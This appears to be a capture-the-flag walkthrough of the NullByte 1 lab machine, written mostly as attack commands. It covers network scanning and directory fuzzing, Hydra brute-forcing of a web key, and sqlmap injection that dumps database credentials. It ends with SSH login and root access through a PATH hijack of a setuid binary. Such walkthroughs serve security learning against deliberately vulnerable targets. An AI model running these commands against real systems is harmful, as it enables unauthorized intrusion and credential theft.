NullByte 1 | Bob1Bob2

Tools:

netdiscover
Nmap
Wfuzz
Nikto
Strings
Hydra

Vulnerabilities:

Use netdiscover to detect target IP address

netdiscover -i eth0 -r 192.168.41.0/24 [title manually exploit [alt text]]

192.168.41.168 is the target.

Then run nmap to detect opening ports and running services on the target machine.

nmap -sV -v -O -A -T5 192.168.41.168 -p-

[title manually exploit [alt text]]

use Nikto to scan

nikto -h 192.168.41.168

[title manually exploit [alt text]]

find phpMyAdmin directory

use wfuzz to scan

wfuzz -c -z file,/usr/share/wordlists/dirbuster/directory-list-2.3-small.txt --hc 404 http://192.168.41.168/FUZZ 2>/dev/null

[title manually exploit [alt text]]

check the page:

[title manually exploit [alt text]]

just a gif image. Download it and use strings to check

strings main.gif

[title manually exploit [alt text]]

find P-): kzMb5nVYJw, try 192.168.41.168/kzMb5nVYJw

[title manually exploit [alt text]]

check the source:

[title manually exploit [alt text]]

use hydra to crack the key:

hydra 192.168.41.168 http-form-post "/kzMb5nVYJw/index.php:key=^PASS^&:invalid key" -P /usr/share/wordlists/rockyou.txt -la -t 10 -w 30

[title manually exploit [alt text]]

got key is elite

enter the key, now we have another page:

[title manually exploit [alt text]]

use sqlmap to get database name: sqlmap -u "http://192.168.41.168/kzMb5nVYJw/420search.php?usrtosearch=aaa" -p usrtosearch --dbs

[title manually exploit [alt text]]

use sqlmap to get tables of database mysql:

sqlmap -u "http://192.168.41.168/kzMb5nVYJw/420search.php?usrtosearch=aaa" -p usrtosearch --dbms mysql -D mysql --tables

[title manually exploit [alt text]]

get column name of table user

sqlmap -u "http://192.168.41.168/kzMb5nVYJw/420search.php?usrtosearch=aaa" -p usrtosearch --dbms mysql -D mysql -T user --columns

[title manually exploit [alt text]]

get Username and Password

sqlmap -u "http://192.168.41.168/kzMb5nVYJw/420search.php?usrtosearch=aaa" -p usrtosearch --dbms mysql -D mysql -T user -C User,Password --dump

[title manually exploit [alt text]]

sqlmap -u "http://192.168.41.168/kzMb5nVYJw/420search.php?usrtosearch=aaa" -p usrtosearch --dbms mysql -D seth --tables

[title manually exploit [alt text]]

sqlmap -u "http://192.168.41.168/kzMb5nVYJw/420search.php?usrtosearch=aaa" -p usrtosearch --dbms mysql -D seth -T users --columns

[title manually exploit [alt text]]

sqlmap -u "http://192.168.41.168/kzMb5nVYJw/420search.php?usrtosearch=aaa" -p usrtosearch --dbms mysql -D seth -T users -C user,pass --dump

[title manually exploit [alt text]]

for ramses’s password, it looks like md5, google it, go to md5decoder get omega.

use this to login ssh

ssh ramses@192.168.41.168 -p 777

get the shell:

[title manually exploit [alt text]]

try command history

[title manually exploit [alt text]]

find it

find / -name "procwatch" 2>/dev/null

in /var/www/backup/procwatch, backup, good.

check the file

ls -alh /var/www/backup/procwatch

[title manually exploit [alt text]]

found it’s setuid

run it

[title manually exploit [alt text]]

find it just run sh and ps

copy /bin/sh to /var/www/backup

cp /bin/sh /var/www/backup/ps

add it to PATH

export PATH=/var/www/backup:$PATH
echo $PATH

run it ./procwatch get root

[title manually exploit [alt text]]